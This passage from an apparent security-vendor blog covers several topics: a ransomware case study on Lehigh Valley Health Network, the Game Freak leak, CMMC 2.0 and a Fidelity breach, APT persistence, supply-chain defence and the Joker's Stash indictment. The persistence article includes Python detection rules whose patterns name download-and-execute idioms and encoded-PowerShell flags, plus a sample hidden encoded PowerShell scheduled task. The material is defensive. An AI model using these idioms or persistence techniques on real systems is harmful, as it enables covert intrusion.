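    # Ordinary object access: the User class GUID, not a replication right.
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": ["bf967aba-0de6-11d0-a285-00aa003049e2"]},
]

if __name__ == "__main__":
    for index, rule in scan(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"event {index}: {rule}")
```

    The DC allow-list is the part that needs tuning in a real environment: Azure AD Connect and some backup products legitimately hold replication rights, so their service accounts must be added or every sync will page the on-call analyst.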

    To read more about this article, click here.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. We provide advanced solutions to protect critical IT infrastructure, such as our popular “CISO-as-a-Service,” through which companies can leverage the expertise of executive-level cybersecurity professionals without bearing the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 


  • Case Study:  2023 Cyberattack on Lehigh Valley Health Network

    Overview

    In early February 2023, Lehigh Valley Health Network (LVHN) fell victim to a cyberattack orchestrated by the ransomware group BlackCat, which has been linked to Russian cybercriminals. The attack, which was detected on February 6, revealed a breach of sensitive data, specifically targeting the Lehigh Valley Physician Group-Delta Medix. This incident raised immediate concerns about the security of patient information and the effectiveness of the healthcare network’s cybersecurity measures.

    The breach was a sophisticated operation typical of BlackCat, which is known for its ability to exploit vulnerabilities in healthcare systems. Upon detection, LVHN initiated a multi-faceted response. This included engaging with cybersecurity experts to conduct a thorough investigation, containing the ransomware, and alerting law enforcement authorities. Despite these efforts, the incident highlighted systemic vulnerabilities within the organization, as it revealed the extent of compromised patient data.

    Ransomware attacks like this are becoming increasingly common, especially in healthcare, where patient information is critical. BlackCat employed a tactic called “triple extortion,” meaning they not only encrypted LVHN’s data but also threatened to leak sensitive information and launch denial-of-service (DoS) attacks to disrupt services. These tactics put immense pressure on organizations to consider paying the ransom. However, LVHN decided against it, which led to the release of sensitive photos online, raising serious ethical concerns and impacting the trust of their patients.


    Impact

    The breach affected the personal information of numerous patients, and LVHN later disclosed that the compromised data varied by individual. It potentially included names, addresses, phone numbers, medical record numbers, treatment details, and health insurance information. More alarmingly, it also involved clinical information such as Current Procedural Terminology (CPT) codes, which identify the specific procedures and services a patient received and therefore reveal the nature of their treatment.

    In some cases, the data theft extended to email addresses, banking information, Social Security numbers, and clinical images of patients undergoing treatment. The loss of clinical images is particularly concerning, as these records can reveal intimate details of a patient’s health status, treatment history, and personal identifiers.

    Following the breach, LVHN took immediate steps to notify affected individuals and offered a complimentary 24-month subscription to Experian’s IdentityWorks service to help monitor potential misuse of their personal information. The organization sent out notification letters that included instructions for activating this membership, acknowledging the stress and concern such an incident can cause.

    In its public statements, LVHN assured the community of its commitment to data protection. They expressed deep regret for any inconvenience caused by the incident, stating, “We are committed to data protection and deeply regret any concern or inconvenience this incident may have caused.” However, the organization faced a dual challenge: managing the technical fallout while maintaining public trust.

    Despite the cyberattack, LVHN reported that its core operations continued without disruption, indicating that its emergency response protocols were somewhat effective. However, the breach’s occurrence during a time of heightened digital health adoption highlighted the increased vulnerability of healthcare systems to cyber threats, especially as more patient data is managed electronically.

    The implications of the breach extended far beyond immediate operational concerns. LVHN faced significant financial repercussions as the incident’s fallout led to a series of lawsuits. By September 2024, LVHN reached a $65 million settlement with victims affected by the data breach, a figure that reflects not only the direct costs associated with managing the aftermath but also the long-term impacts on the organization’s reputation and trustworthiness.

    Healthcare organizations often grapple with the delicate balance between safeguarding sensitive data and maintaining operational efficiency. LVHN’s experience exemplifies how the costs associated with a cyber incident can escalate rapidly, leading to financial strain and potential losses in patient trust.


    What Can Be Learned From This?

    Several key lessons can be drawn from this incident, which may help other organizations strengthen their defenses against similar threats.

    End-user awareness remains the first line of defense. Ransomware affiliates, including those deploying BlackCat, routinely gain their initial foothold through a person: a phishing email, a malicious attachment, or credentials that were reused or phished. Regular training sessions (ideally quarterly) focused on recognizing phishing attempts, handling attachments with caution, and using strong, unique passwords can measurably reduce the chance that such an attempt succeeds.

    Because attackers frequently obtain valid user credentials, deploying MFA is crucial. Requiring a second factor means a stolen password alone is not enough to log in. Not all second factors are equal, though: SMS codes and push notifications can be phished or worn down by repeated prompts, so phishing-resistant methods (FIDO2 security keys or platform authenticators) should be preferred for remote access, email, and administrative accounts. MFA is relatively easy to roll out and significantly reduces the chance of unauthorized access.

    Proper network segmentation can limit the spread of malware within an organization. By isolating critical systems and restricting access based on necessity, healthcare providers can contain potential breaches more effectively. Additionally, adhering to the principle of least privilege ensures that users have only the access necessary for their roles, further reducing the potential attack surface.

    Organizations should leverage security monitoring tools, such as Wazuh, to enhance their threat detection capabilities. By continuously monitoring network traffic and system logs, these tools can identify suspicious activities in real-time, enabling swift incident response. Moreover, integrating threat intelligence feeds can provide valuable insights into emerging threats, allowing organizations to proactively adjust their defenses.

    While it is impossible to prevent all breaches, having a well-defined incident response plan can minimize the impact of an attack. This plan should outline roles and responsibilities, establish communication protocols, and include strategies for data recovery and mitigation. Regular testing and updates to the plan ensure that all personnel are prepared to act decisively in the event of a cybersecurity incident.

    Healthcare organizations must prioritize the protection of patient data by implementing robust encryption, regular audits, and compliance with relevant regulations. This commitment not only safeguards sensitive information but also helps to maintain patient trust in the organization.


    Conclusion

    As cyber threats continue to evolve, the lessons learned from LVHN’s experience can help shape future strategies for protecting sensitive patient information and ensuring the resilience of healthcare systems. By fostering a culture of cybersecurity awareness, investing in the right technologies, and implementing robust incident response plans, healthcare organizations can better safeguard against the pervasive threat of cyberattacks.

    In a landscape where patient data security is paramount, taking proactive steps is not just advisable; it is essential for maintaining the trust and safety of patients and the integrity of the healthcare system as a whole.

  • Pokémon’s ‘Teraleak’: 25 Years of Secrets Unveiled in Massive Game Freak Hack

    In a major security breach, Pokémon developer Game Freak has reportedly suffered what’s being referred to as a “teraleak,” releasing more than 25 years of never-before-seen Pokémon art, assets, and confidential documents. First reported by Nintendo Life, this massive leak includes a treasure trove of concept art, internal development materials, and even plans for canceled movies. The breach, which Game Freak confirmed occurred in August 2024, has left employee names and contact information compromised, though the scope of stolen intellectual property appears to go far beyond that.


    What Was Stolen?

    According to reports circulating on social media, including the PokeLeaks subreddit and posts from Pokémon leak aggregator CentroLeaks, the stolen material includes:

    • Work-in-progress sprites from Generation 3, 4, and 5 Pokémon games
    • Concept art for the 1997 Pokémon anime
    • Detailed background lore on the Pokémon universe
    • Meeting minutes from a discussion on Ash Ketchum’s final story arc
    • Early development pitches for Detective Pikachu 2 and a mystery project titled “Game Boy”
    • Codenames for future hardware, including “Ounce,” thought to be associated with the next Nintendo console, the Switch 2

    This information flood mirrors the 2020 “gigaleak” suffered by Nintendo, which exposed significant amounts of legacy data. The volume and range of content, dubbed the “teraleak,” have sparked extensive discussion and speculation across multiple platforms.


    PII and Design Materials Compromised

    A significant amount of personally identifiable information (PII) was exposed in the Game Freak breach. According to Game Freak’s October 10th statement, the names and company email addresses of 2,606 current and former employees, as well as external contractors, were compromised. This includes personal information related to both employees and individuals working with the company, although there’s no mention of more sensitive data like social security numbers or home addresses being involved.

    Game Freak has confirmed that it is contacting those affected by the breach, and there is speculation that phishing played a role in enabling the attack. Beyond the employee-related information, however, most of the attention has gone to the stolen Pokémon design materials and internal development documents, and the company has yet to officially confirm that any of that material was part of the stolen data. Some suspect that Game Freak is refraining from acknowledging the leaked creative assets to avoid further legitimizing them.


    Was Phishing Involved?

    Online speculation has pointed to phishing as a possible method of access. Many users believe that one of Game Freak’s employees may have been tricked by a phishing scam, which granted the attacker entry into the company’s servers. This theory is gaining traction, especially given the gap between the August breach and the October leak of massive amounts of confidential data.


    What’s Next?

    While Game Freak has taken steps to rebuild its server infrastructure, the implications of the leak are still unfolding. Many speculate that the August breach may have been a precursor to the larger-scale leak now dominating headlines. The long-term effects of this “teraleak” on Game Freak’s projects, along with potential legal actions against those sharing the stolen information, remain to be seen.

    Game Freak now joins the ranks of major game companies like Nintendo and Rockstar, which have both suffered high-profile security breaches in recent years. As more data continues to surface, it’s clear that the ramifications of this breach will resonate throughout the Pokémon community (and beyond) for quite some time.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. We provide advanced solutions to protect critical IT infrastructure, such as our popular “CISO-as-a-Service,” through which companies can leverage the expertise of executive-level cybersecurity professionals without bearing the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. As part of our commitment to supporting businesses in their compliance journey, we offer CMMC (Cybersecurity Maturity Model Certification) preparation services. Our team assists organizations in understanding the CMMC requirements and developing the necessary controls to meet compliance standards, ensuring they are well-prepared for CMMC assessments.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact


  • Netizen: Monday Security Brief (10/14/2024)

    Today’s Topics:

    • DoD Finalizes CMMC 2.0 Rule: What Contractors Need to Know for 2025 Compliance
    • 77,000 Customers Impacted in Fidelity Investments Data Breach
    • How can Netizen help?

    DoD Finalizes CMMC 2.0 Rule: What Contractors Need to Know for 2025 Compliance

    The Department of Defense (DoD) has taken a significant step toward rolling out its updated Cybersecurity Maturity Model Certification (CMMC) 2.0 by releasing the final rule. The rule is now available for public review on the Federal Register, with the official publication expected on October 15. This move sets the stage for full implementation of CMMC 2.0 by mid-2025, according to the DoD’s recent announcement.

    CMMC 2.0 is designed to help safeguard sensitive government information—like controlled unclassified information (CUI) or federal contract information (FCI)—on contractor systems. The model introduces tiered levels of cybersecurity compliance based on the nature of the data a contractor handles. The goal is to protect DoD data from being exploited by adversaries while streamlining the process, especially for smaller contractors. CMMC 2.0 reduces the compliance levels from five to three to make it easier for companies to meet these new standards.

    This effort is the culmination of several years of work. It began during the previous administration when the initial framework was developed. In December 2023, the DoD kickstarted the federal rulemaking process for CMMC 2.0 by publishing a proposed rule. This was followed in August 2024 by another proposal to update the Defense Federal Acquisition Regulation Supplement (DFARS), which will make cybersecurity a key factor in future Pentagon contracts.

    The plan is for these DFARS updates to be finalized and implemented by mid-2025. At that point, CMMC compliance will be a requirement in DoD contracts. Contractors that handle CUI or FCI must meet the appropriate cybersecurity level to secure contract awards.

    For companies dealing with less sensitive data, the DoD has built in flexibility, allowing them to conduct self-assessments of their cybersecurity practices. However, those handling more critical information will be required to undergo third-party assessments or assessments led by the Defense Industrial Base Cybersecurity Assessment Center to verify their compliance.

    The CMMC initiative hasn’t been without criticism. Many in the defense industry, particularly small businesses, have expressed concerns over the cost and complexity of meeting these new requirements. In response, the DoD has committed to providing resources to help contractors navigate the process.

    One important feature of CMMC 2.0 is the use of Plans of Action and Milestones (POA&Ms). A contractor that has not yet met every required practice can receive a conditional certification status, but the open items must be closed out within 180 days or the status lapses; only certain lower-weighted requirements may be deferred this way, and a minimum assessment score must still be reached. This gives contractors time to reach full compliance without losing out on contract opportunities.

    The DoD recognizes that meeting these new cybersecurity requirements will take time and effort, but it’s urging businesses in the defense sector to begin assessing their current security practices and start preparing for the upcoming CMMC assessments.

    To read more about this article, click here.


    77,000 Customers Impacted in Fidelity Investments Data Breach

    Fidelity Investments is alerting tens of thousands of individuals that their personal information was compromised in a recent data breach. The financial services company reported that unauthorized activity occurred between August 17 and 19, leading to the exposure of sensitive customer information.

    According to reports filed with attorneys general in various states, the attacker created two fraudulent customer accounts. These accounts were then used to access and retrieve images of documents containing personal details from an internal Fidelity database. The breach was identified and contained on August 19, when Fidelity shut down the unauthorized access.

    While Fidelity has indicated that the breach impacted only a “small subset” of customers, it reported to Maine’s Attorney General that over 77,000 individuals were affected. Compromised information includes names, Social Security numbers, financial account details, and driver’s license data. However, the company assured that no customer accounts or funds were jeopardized.

    In response, Fidelity is offering those impacted two years of free credit monitoring and identity restoration services. This breach marks the second significant security incident the company has disclosed in 2024. Earlier this year, roughly 30,000 individuals were notified of a separate data breach involving a third-party service provider, Infosys McCamish Systems (IMS).

    Fidelity Investments, which manages $14 trillion in assets and serves over 51 million individual investors, continues to take steps to address these security challenges and safeguard customer information.

    To read more about this article, click here.




  • What Is Persistence in Cybersecurity and How Do You Stop an Advanced Persistent Threat (APT)?

    Persistence is the set of techniques an attacker uses to keep access to a compromised system across reboots, password changes, and other routine disruptions. An advanced persistent threat (APT) is an adversary, typically a well-resourced and often state-sponsored group, that combines persistence with stealth to hold long-term, undetected access, frequently for months or years. Unlike opportunistic, smash-and-grab attacks, an APT intrusion is designed to go unnoticed for as long as possible so that the attacker can keep operating inside the network.

    This blog will discuss the impacts of APTs, how persistence methods work, and the various ways attackers achieve and maintain access within a network.


    ATA vs. APT: What’s the Difference?

    The terms Advanced Targeted Attack (ATA) and Advanced Persistent Threat (APT) are sometimes used interchangeably, but they describe different things. An ATA is a specific, tailored intrusion aimed at a chosen organization; it is the methodology that APT groups such as “Fancy Bear” or “Lazarus” use to get in. The APT is the adversary and the sustained campaign it runs once inside. The tactics vary from group to group, but the goal is consistent: establishing a long-term presence in the target’s environment. In short, ATAs are the toolset, while APT describes the sustained control the attackers maintain.


    How Do APTs Remain Hidden for So Long?

    One of the most significant challenges in addressing APTs is their ability to remain undetected. Many organizations, especially SMBs, lack the monitoring and detection capabilities needed to spot an intruder on their networks. Industry figures bear this out: IBM’s 2022 Cost of a Data Breach Report put the average time to identify a breach at 207 days, roughly seven months. During that window attackers can create additional user accounts, gain remote access to key systems, and take control of servers, all without triggering a security alert.

    Additionally, threat actors may create diversionary tactics, such as launching a DDoS attack, to mislead security professionals, while their primary attack, the APT, continues undetected. Such tactics allow them to focus on higher-value targets while the organization scrambles to address the decoy attack.


    Key Risks Posed by Advanced Persistent Threats

    APTs pose a wide array of risks, as attackers can exploit their access for multiple malicious purposes. These include:

    • Infiltrating the victim’s supply chain, targeting partners, vendors, or customers.
    • Cyber espionage, often driven by nation-states looking to compromise government agencies or critical infrastructure.
    • Cybersecurity reconnaissance, allowing attackers to observe weaknesses in an organization’s defenses or identify users susceptible to phishing.
    • Initiating watering-hole attacks, in which attackers compromise websites frequently visited by their targets.
    • Exfiltrating data without detection, leveraging the long-term access to avoid raising red flags.
    • Intellectual property theft, particularly sensitive in industries like technology, defense, or pharmaceuticals.
    • Slowly leaking sensitive data, evading detection by blending in with normal network activity.

    How Does the Persistence Method Work?

    Hackers use a variety of techniques to maintain their foothold within a compromised network, including:

    • Windows services and other autostart entries: creating a new service, changing an existing service’s binary path, or adding registry Run keys and scheduled tasks so the implant is relaunched at every boot or logon.
    • Misconfigurations: exploiting improperly configured security settings, such as weak permissions on service binaries or over-privileged accounts.
    • Custom malware: developing tooling that existing controls do not recognize, or leveraging zero-day exploits to bypass them.
    • Domain-based persistence: compromising a domain controller or other key servers gives attackers a foothold across every connected system, for example by forging Kerberos tickets or by adding credentials to privileged accounts.

    Attackers also take advantage of multi-stage operations to establish a foothold. After initial access—often through phishing, social engineering, or exploiting known vulnerabilities—they install malware like backdoors or rootkits. These tools allow them to maintain access while remaining hidden from most monitoring systems.

    They also use privilege escalation techniques, gradually gaining more control over the system by exploiting software vulnerabilities or using stolen credentials. By obtaining administrative privileges, attackers can move laterally through a network, exfiltrating data or preparing the system for larger attacks without detection.
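    Each of the persistence mechanisms listed above produces a log event at the moment it is created: Security 4698 when a scheduled task is registered, System 7045 when a service is installed, Sysmon 13 when a Run key value is written, and Sysmon 20 when a WMI event consumer appears. The Python below is an added example for this page, not code from the original post; it runs a few simple rules over constructed events and flags autostart entries that point outside trusted directories, invoke a script host with encoded or user-writable input, or register a WMI consumer. The trusted-directory list, the task XML, the file paths, and the strings Sysmon puts in the Type field are all assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Directories autostart binaries normally run from (assumption; extend for your estate).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
ENV_VARS = {"%systemroot%": "c:\\windows", "%windir%": "c:\\windows",
            "%programfiles%": "c:\\program files"}
# Interpreters that rarely belong in an autostart entry.
SCRIPT_HOST_RE = re.compile(
    r"(?i)(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)(\.exe)?\b")
# Encoded commands or download-and-execute idioms in the arguments.
ENCODED_RE = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b|downloadstring|invoke-expression|\biex\b")
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")
RUN_KEY_RE = re.compile(r"(?i)\\currentversion\\run(once)?\\")
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")


def normalize(path):
    """Lower-case, drop surrounding quotes and expand the common %VAR% forms."""
    p = path.strip().strip('"').lower()
    for var, value in ENV_VARS.items():
        p = p.replace(var, value)
    return p


def suspicious_command(command, arguments=""):
    """Flag autostarts outside trusted dirs, or script hosts fed encoded/user-writable input."""
    exe = normalize(command)
    if not exe.startswith(TRUSTED_DIRS):
        return True
    if SCRIPT_HOST_RE.search(exe):
        full = exe + " " + normalize(arguments)
        if ENCODED_RE.search(full) or any(d in full for d in USER_WRITABLE):
            return True
    return False


def scheduled_task_action(task_xml):
    """Extract (Command, Arguments) from the TaskContent XML of Security event 4698."""
    # 4698 embeds a UTF-16 declaration that expat rejects when handed a str, so drop it.
    root = ET.fromstring(XML_DECL_RE.sub("", task_xml, count=1))
    exec_node = root.find(".//t:Actions/t:Exec", TASK_NS)
    if exec_node is None:
        return None
    return (exec_node.findtext("t:Command", default="", namespaces=TASK_NS),
            exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS))


def check_event(event):
    """Return the name of the matching rule, or None."""
    channel, eid = event["Channel"], event["EventID"]
    if channel == "Security" and eid == 4698:            # scheduled task created
        action = scheduled_task_action(event["TaskContent"])
        if action and suspicious_command(*action):
            return "suspicious_scheduled_task"
    elif channel == "System" and eid == 7045:            # service installed
        if suspicious_command(event["ImagePath"]):
            return "suspicious_service"
    elif channel == "Sysmon" and eid == 13:              # registry value written
        if RUN_KEY_RE.search(event["TargetObject"]) and suspicious_command(event["Details"]):
            return "suspicious_run_key"
    elif channel == "Sysmon" and eid == 20:              # WMI event consumer created
        # Consumer class as rendered by Sysmon; the exact strings are an assumption.
        if event.get("Type") in {"Command Line", "Script", "CommandLineEventConsumer",
                                 "ActiveScriptEventConsumer"}:
            return "wmi_event_consumer"
    return None


def scan(events):
    """Return (index, rule) for each event that trips a rule."""
    findings = []
    for i, event in enumerate(events):
        rule = check_event(event)
        if rule:
            findings.append((i, rule))
    return findings


# Constructed sample events (not real telemetry).
MALICIOUS_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
    <Arguments>-NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA</Arguments>
  </Exec></Actions>
</Task>"""
BENIGN_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author"><Exec>
    <Command>%windir%\system32\sc.exe</Command>
    <Arguments>start w32time task_started</Arguments>
  </Exec></Actions>
</Task>"""
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4698, "TaskContent": MALICIOUS_TASK},
    {"Channel": "Security", "EventID": 4698, "TaskContent": BENIGN_TASK},
    {"Channel": "System", "EventID": 7045, "ImagePath": r'"C:\Users\Public\Libraries\svchost.exe" -k'},
    {"Channel": "System", "EventID": 7045, "ImagePath": r"%SystemRoot%\System32\svchost.exe -k netsvcs"},
    {"Channel": "Sysmon", "EventID": 13, "Details": r"C:\Users\alice\AppData\Roaming\upd.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"Channel": "Sysmon", "EventID": 13, "Details": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive"},
    {"Channel": "Sysmon", "EventID": 20, "Type": "Command Line", "Name": "Updater",
     "Destination": "powershell.exe -enc SQBFAFgA"},
]

if __name__ == "__main__":
    for index, rule in scan(SAMPLE_EVENTS):
        print(f"event {index}: {rule}")
```

    These rules are deliberately coarse; in production the trusted-directory check should be paired with signature or hash checks on the binary, since a path under Program Files says nothing about whether the file there was replaced.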


    Case Studies: Learning from Real-World APT Incidents

    Examining real-world APT incidents provides invaluable insight into attacker tactics. The SolarWinds breach, in which attackers compromised the vendor’s build process and shipped a backdoor inside legitimately signed Orion software updates to thousands of organizations, is a cautionary tale about the risk carried by third-party vendors. By studying such incidents, organizations can identify gaps in their own security posture and develop targeted strategies to close them. Analyzing the timeline of an attack, the methods of exploitation, and the subsequent response offers lessons on improving detection capabilities and refining incident response protocols, ultimately leading to a stronger defense against future APTs.


    Countermeasures Against APTs

    Stopping an APT requires a combination of proactive defense strategies and comprehensive detection systems. To protect against these threats, organizations should focus on the following measures:

    • Advanced Threat Detection: Implementing sophisticated detection systems like Intrusion Detection Systems (IDS), Security Information and Event Management (SIEM) tools, and endpoint detection and response (EDR) platforms. These solutions help monitor for unusual activity, such as unauthorized access attempts or irregular data transfers.
    • Network Segmentation: Limiting access across different areas of your network can reduce the potential damage of an APT. If an attacker gains access to one segment, network segmentation ensures they cannot move freely across the entire infrastructure.
    • Regular Patching: Keeping software and systems up-to-date by applying security patches as soon as vulnerabilities are disclosed. Attackers often exploit known vulnerabilities, so staying current on updates is one of the simplest but most effective defenses.
    • User Awareness Training: Educating employees about phishing attacks and other social engineering methods can significantly reduce the chances of attackers gaining an initial foothold in the network.
    • Multi-Factor Authentication (MFA): Requiring MFA for all critical systems can make it more difficult for attackers to use stolen credentials to gain access.
    • Incident Response Planning: Having a well-defined incident response plan ensures that if an APT is detected, your organization can act quickly to contain and eliminate the threat. Regularly testing and updating this plan is crucial.
    • Continuous Monitoring: Automated tools that provide continuous system scanning and monitoring, like Netizen’s offerings, are essential for detecting APTs early. By continuously assessing the network for vulnerabilities, misconfigurations, and suspicious activity, businesses can catch attacks before they escalate.



  • Strengthening Supply Chain Security: Closing the Gaps Before Attackers Find Them

    As organizations have reinforced their defenses against direct attacks, hackers have increasingly turned their attention to the supply chain, exploiting vulnerabilities in third-party systems to gain access to larger networks. These backdoor supply chain attacks have led to significant security breaches in recent years, putting businesses and their data at serious risk.

    A growing number of these incidents involve vulnerabilities in commonly-used IT and security tools. One recent example involves Ivanti enterprise VPNs, where attackers took advantage of a zero-day flaw to deploy a backdoor called ‘DSLog’. Similarly, a remote code execution vulnerability in TeamCity was exploited—likely by the APT29 group—using PowerShell scripts to install malicious certificates and download malware. The popular file transfer tool GoAnywhere MFT also became a target for ransomware groups like LockBit and Cl0p, who used it to execute remote code, causing major disruptions, particularly in healthcare.

    These examples make it clear that weaknesses in widely-used management tools are prime targets for both state-sponsored actors and ransomware groups. Protecting against such supply chain cyberattacks is more crucial than ever.


    Supply Chain Attacks Aren’t New

    While supply chain attacks have recently made headlines, they’ve been a favorite tactic of cybercriminals for years. Hackers have repeatedly exploited security gaps in third-party providers and vendors to compromise larger organizations. The infamous SolarWinds Orion attack and the breach involving VMware Workspace ONE are prime examples of successful supply chain intrusions.

    One of the most notorious supply chain attacks remains the RSA SecurID token breach. In that case, attackers leveraged stolen information to infiltrate RSA’s authentication system, ultimately compromising high-profile customers like Lockheed Martin.


    Addressing Supply Chain Security Risks

    Failures in third-party systems can result in not only data loss but also severe operational and reputational damage. Basic vendor management is no longer enough—companies need to actively safeguard against third-party control failures. Here are some key strategies to consider:

    1. Implement Advanced Supplier Risk Management

    Ensure that every vendor or supplier follows strict cybersecurity protocols. This includes assessing their compliance with relevant standards such as ISO 27001, NIST, or GDPR. Vendors should be evaluated based on the sensitivity of the data they handle and the criticality of their services. You may also want to require independent security testing of software applications before deployment.

    2. Secure the Software Development Pipeline

    Protect access to the tools and applications used by DevOps teams. This includes securely managing the secrets used in build and deployment configuration and authenticating applications with a high degree of confidence. It’s also essential to require that software providers extend security measures to cover microservices, cloud infrastructure, and DevOps environments.

    3. Keep Systems and Software Updated

    Regularly update and patch your systems and those of your suppliers. Unsupported or outdated software introduces vulnerabilities that attackers can easily exploit. Keeping everything current is a simple yet effective way to reduce risks.

    4. Harden Your Environment

    When working in cloud environments, reject authorization requests that don’t meet accepted security norms. For on-premises systems, use Federal Information Processing Standards (FIPS)-validated Hardware Security Modules (HSMs) to protect token-signing certificates and private keys. HSMs help reduce the risk of key theft by malicious actors.

    5. Strengthen Access Controls

    Limit vendor access to only the systems and data necessary for their operations. Multi-factor authentication should be mandatory for third-party access to your systems. A Zero Trust approach can further enhance security by requiring continuous verification of all users before access is granted.

    6. Use Security Tools and Technologies

    Segment your network to prevent lateral movement if one section is breached. Tools like Endpoint Detection and Response (EDR) solutions can help identify malicious activities on devices connected via third parties. Encrypting sensitive data—both at rest and in transit—will also minimize the damage in the event of a breach.

    7. Adopt Cybersecurity Frameworks and Best Practices

    Implement frameworks like the NIST Cybersecurity Framework (CSF) to identify, protect, detect, and respond to cyber threats. Consider adopting supply chain-specific frameworks, such as ISO 28001 or the Shared Assessments Standardized Information Gathering (SIG), to better manage supply chain risks.

    8. Incorporate Cybersecurity in Contracts

    Make sure vendor contracts include clear cybersecurity requirements, including mandatory security controls, data protection measures, and breach notification procedures. For high-risk vendors, consider requiring third-party audits or independent security assessments to verify their security posture.


    Why Supply Chain Security Matters

    Supply chain attacks are not a new phenomenon, with past breaches such as the SolarWinds Orion and RSA SecurID token attacks serving as early warnings of the risks. These incidents caused substantial harm by exploiting third-party systems to gain access to high-value targets. Today, protecting against these threats is more essential than ever, requiring businesses to go beyond basic vendor management practices. Implementing advanced risk management strategies, securing development pipelines, keeping systems updated, and hardening network environments are crucial steps. Additionally, strengthening access controls, adopting cybersecurity frameworks, and incorporating security requirements into vendor contracts can significantly reduce risks.

    Netizen helps businesses stay ahead of these threats by offering comprehensive solutions like CISO-as-a-Service, vulnerability assessments, and continuous monitoring through automated assessment tools. Our services are designed to secure the entire IT infrastructure, ensuring that businesses are protected from the growing threat of supply chain cyberattacks.


    How Can Netizen Help?

    Netizen ensures that security gets built in, not bolted on, by providing advanced solutions to protect critical IT infrastructure, such as the popular “CISO-as-a-Service”, through which companies can leverage the expertise of executive-level cybersecurity professionals without bearing the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.


  • Joker’s Stash Busted: Russian Hackers Indicted in Massive Financial Cybercrime Operation

    On September 26th, the U.S. Department of Justice (DOJ) announced significant legal actions targeting two prominent Russian cybercriminals. The individuals involved—Timur Kamilevich Shakhmametov, allegedly behind the notorious carding platform Joker’s Stash, and a top Russian cybercriminal known as “Taleon”—have both been indicted and sanctioned. These individuals are accused of facilitating some of the largest financial cybercrimes of the past decade.


    Joker’s Stash: A Billion-Dollar Carding Empire

    Shakhmametov, a 38-year-old from Novosibirsk, Russia, is charged with operating Joker’s Stash, a once-popular underground marketplace for stolen credit card data. The DOJ alleges that Shakhmametov—using the alias “Vega”—sold millions of payment cards obtained from high-profile data breaches at retailers like Saks Fifth Avenue, Hilton Hotels, Chipotle, and Sonic Drive-In, among others. Joker’s Stash was a major player in the world of carding, operating from late 2014 until its closure in 2021.

    What set Joker’s Stash apart from other carding platforms was its focus on high-volume buyers, such as street gangs in the U.S., and its innovative business model. The platform offered loyalty programs, money-back guarantees, and exclusive access to the freshest stolen cards. It also claimed to sell only cards stolen directly by its own hackers, unlike competitors who sourced from third-party criminals.

    Joker’s Stash reportedly earned revenues ranging from $280 million to over $1 billion. The broad range is attributed to variables like the fluctuating value of cryptocurrencies and the sale price of stolen goods. Despite its closure in early 2021, following a series of European law enforcement actions and the site operator contracting COVID-19, Joker’s Stash remains one of the most infamous cybercrime platforms in recent memory.


    Taleon: The Mastermind Behind Russia’s Money Laundering Network

    While Joker’s Stash was highly profitable, Taleon’s ventures may have had an even greater financial impact. Taleon, whose real name remains undisclosed, allegedly operates Cryptex, a cryptocurrency exchange that has become one of Russia’s largest money laundering hubs. Cryptex is accused of moving billions of dollars in illicit funds, providing a crucial infrastructure for cybercriminals seeking to launder money from stolen payment cards and ransomware payouts.

    Taleon is described as a key facilitator for Russian cybercriminal organizations, offering financial services that allow them to cash out their illicit earnings. By running Cryptex and other financial networks, Taleon helped convert cryptocurrency into traditional currency, enabling hackers to profit from their crimes with minimal risk of detection.


    Coordinated International Effort

